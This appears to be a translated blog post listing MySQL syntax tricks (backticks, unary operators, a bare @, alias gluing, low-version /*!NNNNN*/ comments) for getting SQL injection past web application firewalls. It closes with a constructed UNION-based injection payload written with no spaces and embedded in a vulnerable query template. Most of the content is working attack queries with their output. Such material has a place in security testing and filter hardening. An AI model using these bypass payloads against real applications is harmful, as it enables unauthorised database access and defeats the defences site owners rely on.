I have looked at a fair number of WAFs, domestic and foreign, and want to share a few neat tricks.
Tricks everyone already knows, such as `/*! */` inline comments and replacing the space in `SELECT xx FROM` with another whitespace byte (0x09, 0x0A-0x0D, 0x20, 0xA0), are not repeated here; no need to reinvent the wheel.
MySQL
Tips1: The magic backtick ` (the identifier quote character)
It can stand in for a space and breaks a number of regular-expression filters.
mysql> select`version`();
+----------------------+
| `version`()          |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)
A more interesting use: under the right conditions the backtick also works as a comment marker. An unterminated backtick opens an identifier that runs to the end of the input, so everything after it is swallowed:
mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
Usage: `where id='0'`' xxxx`, where the backtick swallows the trailing quote and whatever follows. Note that the swallowed tail is not a real comment: in the example above the statement was already terminated by `;`, so the garbage after the backtick cannot affect its result; where the injection lands decides whether what is left still parses.
Tips2: The magic + and -
Unary `+`/`-` and a number written with a trailing dot (`1.`) let you glue operands directly onto keywords, so no space is needed around the column or before `from`:
mysql> select id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)
mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)
(People keep asking why keywords matter here. A filter that matches `xx from` with a space in front of `from` is defeated when `from` is attached this way.)
Tips3: @
A bare `@` is a user variable with an empty name, which is NULL, so it can be glued onto the next token just like the operators above:
mysql> select@^1.from qs_admins;
+------+
| @^1. |
+------+
| NULL |
+------+
This was used to bypass the DedeCMS filter, and it still works.
Tips4: A MySQL function alias, `function() xxx`, needs neither `as` nor a space
mysql> select-count(id)test from qs_admins;
+------+
| test |
+------+
|   -1 |
+------+
1 row in set (0.00 sec)
Tips5: `/*!NNNNN */` with a made-up version number (this one may be outdated)
MySQL executes the body of a `/*!NNNNN ... */` comment whenever the server version is at least NNNNN, so any number below the running version will do; filters that only look for the usual `/*!50000` miss the others, and the version number can touch the keyword directly:
mysql> /*!40000select*/ id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
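To show how the five tricks combine, here is an added example (my own, not from the original post) that rewrites each of the queries above without a single 0x20 byte and then embeds a payload built from them into an assumed vulnerable query. The `qs_admins` table with only an `id` column comes from the post; the `username` and `pwd` columns, the two rows, and the vulnerable query template are constructed for the demo.

```sql
-- Constructed fixture: the post only shows qs_admins has an id column,
-- the other columns and the rows are assumptions for this demo.
CREATE TABLE qs_admins (id INT PRIMARY KEY, username VARCHAR(32), pwd VARCHAR(64));
INSERT INTO qs_admins VALUES (1, 'admin', 'x'), (2, 'guest', 'y');

-- 1. Each trick on its own; none of these statements contains a space.
select`version`();                        -- Tips1: backtick instead of a space
select+id-1+1.from`qs_admins`;            -- Tips2: unary +, "1." glued to FROM
select@^1.from`qs_admins`;                -- Tips3: bare @ is a NULL user variable
select-count(id)`test`from`qs_admins`;    -- Tips4: alias without AS; backticks drop the space
/*!40000select*/`id`from`qs_admins`;      -- Tips5: low, unusual version number

-- 2. Where such a payload ends up. Assumed vulnerable template:
--      SELECT username FROM qs_admins WHERE id='<input>'
--    with the input
--      0'union/*!40000select*/`version`()from`qs_admins`where`id`=1#
--    the server receives the statement below: the first SELECT matches
--    nothing, the UNION branch returns version(), and '#' eats the quote
--    the application appends. A filter keyed on " union select " or on
--    "/*!50000" never sees either string.
SELECT username FROM qs_admins WHERE id='0'union/*!40000select*/`version`()from`qs_admins`where`id`=1#';
```

Run it against a scratch database you control; the last statement returns one row containing the server version. The backtick-as-comment trick from Tips1 is left out deliberately: an unterminated backtick makes the mysql command-line client wait for the closing quote, so it is awkward to demonstrate in a script.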
That's all for now.